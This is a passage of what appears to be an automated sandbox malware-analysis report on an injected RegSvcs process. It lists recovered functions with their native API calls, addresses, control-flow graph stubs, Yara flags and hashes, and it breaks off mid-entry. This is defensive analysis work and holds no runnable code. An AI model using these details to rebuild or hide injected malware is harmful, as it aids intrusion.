                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 2ccf1af8b1afc4039ea8271a65d5ec8a78ac774a0c6154e0d45900dd57b3cca3
                                          • Instruction ID: 34c4158c7035c3201076cb6992f7939b7151f1a69bee33a53c60aa8d7b13dc8b
                                          • Opcode Fuzzy Hash: 2ccf1af8b1afc4039ea8271a65d5ec8a78ac774a0c6154e0d45900dd57b3cca3
                                          • Instruction Fuzzy Hash: 5111A374C141085EEF25CEB0DD45ADFB778EB40324F20026EEA61A61A2E3B4190D8F81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DEA1 Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 306 41dea1-41def8 call 41eb17 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187F3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187F3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction ID: 76886fd1fa7346b0aab19e964d9b1aa73b83f4006ed5145762f29fd3670f22a2
                                          • Opcode Fuzzy Hash: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction Fuzzy Hash: 2F01B6B2600108AFCB58CF99DC85EEB37A9EF8C754F118219BE0DD7241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DEA7 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 41dea7-41debd 310 41dec3-41def8 NtCreateFile 309->310 311 41debe call 41eb17 309->311 311->310
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187F3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187F3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction ID: caa4313a033a612cc3db5c025c9ef0f97435adee46135c765efab3485d53b6e5
                                          • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction Fuzzy Hash: 64F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018208BA0997241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DF57 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 41df57-41dfa0 call 41eb17 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(004189B7,00413C93,FFFFFFFF,004184A1,00000206,?,004189B7,00000206,004184A1,FFFFFFFF,00413C93,004189B7,00000206,00000000), ref: 0041DF9C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction ID: 655cb4e4c396fce941b8546bf9d16efbca437de042abb1fe47c2fd903f90b2bb
                                          • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction Fuzzy Hash: 76F0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DFD7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00418995,00000206,?,00418995,00000005,FFFFFFFF), ref: 0041DFFC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction ID: d7652ac376bfee5cbf167f0e09bc99e97af7e0678d6cdc255ef65e079968a69b
                                          • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction Fuzzy Hash: 78D01776204214ABD614EBA9DC89ED77BACDF48664F014155BA0D5B242D631FA008BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DFD1 Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00418995,00000206,?,00418995,00000005,FFFFFFFF), ref: 0041DFFC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction ID: 3d21b19ef568e9596e24c7ef5757160b60eef1f82d4920551701afcaed2e002f
                                          • Opcode Fuzzy Hash: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction Fuzzy Hash: 19E0C2BA40D3C04FC721EB78A4C00C6BF54DF9212872555CFD8955B603D261A216DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
                                          • Instruction ID: 34151ade5806bbf71e8b8819996a3cdbfc9045146a9652c26ad180fc56fd6287
                                          • Opcode Fuzzy Hash: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
                                          • Instruction Fuzzy Hash: 1F9002B530100403D540719944047460045A7E0345F51C021A5054594EC6999DD976A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
                                          • Instruction ID: 0e956ea85d43c82f80a5588f995596dd662b6d04af8f44d0fe4197390cd454e8
                                          • Opcode Fuzzy Hash: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
                                          • Instruction Fuzzy Hash: 279002A534100443D50061994414B060045E7F1345F51C025E1054594DC659DC56716A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
                                          • Instruction ID: 459d15be89f7e1591502f4652df86cbeaa9056de4fe3426ea1bc8d7cb4947672
                                          • Opcode Fuzzy Hash: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
                                          • Instruction Fuzzy Hash: 6E90027530100413D511619945047070049A7E0285F91C422A0414598DD6969D56B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
                                          • Instruction ID: 498d9a456eb62590d77414ec8c2776b830935af46f969968e0934e224456c096
                                          • Opcode Fuzzy Hash: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
                                          • Instruction Fuzzy Hash: EE900265342041539945B19944045074046B7F0285791C022A1404990CC566AC5AE665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013398F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
                                          • Instruction ID: ecea57b7b2041fe90a6a566cf0a19ef6b7ccf7ccc7d87518d9c7b06b225cb57a
                                          • Opcode Fuzzy Hash: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
                                          • Instruction Fuzzy Hash: 0F90026570100503D50171994404616004AA7E0285F91C032A1014595ECA659D96B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
                                          • Instruction ID: dcbee2efdbe4dd602c9619e563dc6988026ef4ab370ab7f86a8bb77fb33caacf
                                          • Opcode Fuzzy Hash: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
                                          • Instruction Fuzzy Hash: FD90026570100043854071A988449064045BBF1255751C131A0988590DC5999C6966A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
                                          • Instruction ID: 884874bc3b91629e9553cfa4da00fe35ff54c9024ad536f662d08ab11c33ab0f
                                          • Opcode Fuzzy Hash: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
                                          • Instruction Fuzzy Hash: 3B90027530140403D5006199481470B0045A7E0346F51C021A1154595DC6659C5575B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
                                          • Instruction ID: c37ab6398a5506bdc4b34fe4d0d1ab5b5e2b9b4aab2bb4d5f8c293fd9fd76051
                                          • Opcode Fuzzy Hash: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
                                          • Instruction Fuzzy Hash: BD90026531180043D60065A94C14B070045A7E0347F51C125A0144594CC9559C656565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
                                          • Instruction ID: a4239461e20a19da72ea31f0318d20d6ed9bb526eac1e83ee1c04c83f864334b
                                          • Opcode Fuzzy Hash: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
                                          • Instruction Fuzzy Hash: D2900269311000034505A59907045070086A7E5395351C031F1005590CD6619C656165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
                                          • Instruction ID: e0779b9be53de05bd6c35c83ad60546f8398b95f399db055a3614d1e2fda6482
                                          • Opcode Fuzzy Hash: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
                                          • Instruction Fuzzy Hash: 099002A530200003850571994414616404AA7F0245B51C031E10045D0DC5659C957169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
                                          • Instruction ID: 424b9e2b3a9ed752bc6b804e9645aeb81512f7bc1c7f8df4653a301a6a31ec2d
                                          • Opcode Fuzzy Hash: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
                                          • Instruction Fuzzy Hash: BC90027530100403D50065D954086460045A7F0345F51D021A5014595EC6A59C957175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013397A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
                                          • Instruction ID: 3bc11c8ce82b53e441e205f8cf08f4f94dd1fd027005055b63e3cd914bfad2e6
                                          • Opcode Fuzzy Hash: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
                                          • Instruction Fuzzy Hash: 6290026530100003D540719954186064045F7F1345F51D021E0404594CD9559C5A6266
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
                                          • Instruction ID: d7cfaf868bb7511ed8805e251b376f63972e51b787df444d4f4c6afad56bee8e
                                          • Opcode Fuzzy Hash: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
                                          • Instruction Fuzzy Hash: A290026D31300003D5807199540860A0045A7E1246F91D425A0005598CC9559C6D6365
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
                                          • Instruction ID: a8160ebdd8352e378aa54f96549d4aae36abb4591ec7690190b2ada1cb3e86e5
                                          • Opcode Fuzzy Hash: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
                                          • Instruction Fuzzy Hash: 4990027531114403D510619984047060045A7E1245F51C421A0814598DC6D59C957166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
                                          • Instruction ID: e7f0b817cc9a419807fcdf259c4276eb28cea91bc0147c3b84fa26d6de4cf929
                                          • Opcode Fuzzy Hash: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
                                          • Instruction Fuzzy Hash: CF90027530100803D5807199440464A0045A7E1345F91C025A0015694DCA559E5D77E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
                                          • Instruction ID: df69e47551c4cad9191ce19d71fe3eee726331cfac70a0d86c217de13437cc2c
                                          • Opcode Fuzzy Hash: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
                                          • Instruction Fuzzy Hash: 8390027530108803D5106199840474A0045A7E0345F55C421A4414698DC6D59C957165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E1E9 Relevance: 3.1, APIs: 2, Instructions: 69memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 34 41e1e9-41e1ed 35 41e17b-41e18b 34->35 36 41e1ef-41e1f3 34->36 40 41e193-41e1a8 RtlAllocateHeap 35->40 41 41e18e call 41eb17 35->41 38 41e1f5-41e21f call 41eb17 ExitProcess 36->38 39 41e254-41e27f 36->39 41->40
                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          • ExitProcess.KERNEL32(?,00000000,000000FC,?,?,00000001), ref: 0041E21F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateExitHeapProcess
                                          • String ID:
                                          • API String ID: 1054155344-0
                                          • Opcode ID: fdcd4ceabbfc5d1b7861bf68a596593ed65f470669e468e0adafd6376cd19152
                                          • Instruction ID: 162caa7d4a894d3a06d7b5dfc8776c07fc6959f4a841d21050d781d56322f286
                                          • Opcode Fuzzy Hash: fdcd4ceabbfc5d1b7861bf68a596593ed65f470669e468e0adafd6376cd19152
                                          • Instruction Fuzzy Hash: C8118BB6204248AFCB14DFA9DC80CEB77ADAF8C354F118249F94D87212C634E952CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408D97 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 252 408d97-408de1 call 41faf7 call 4205e7 call 40c327 call 418a97 261 408de3-408df5 PostThreadMessageW 252->261 262 408e15-408e19 252->262 263 408e14 261->263 264 408df7-408e11 call 40ba87 261->264 263->262 264->263
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DF1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 1ed508e0c1479fd51ca27d8f4ca93e8f9cc4b3cfe03b86c0649f6ea35fb5846c
                                          • Instruction ID: 58e58f9e7d72cd2cdff23c6cb419043715453cad09f0fd83601a4629f579038d
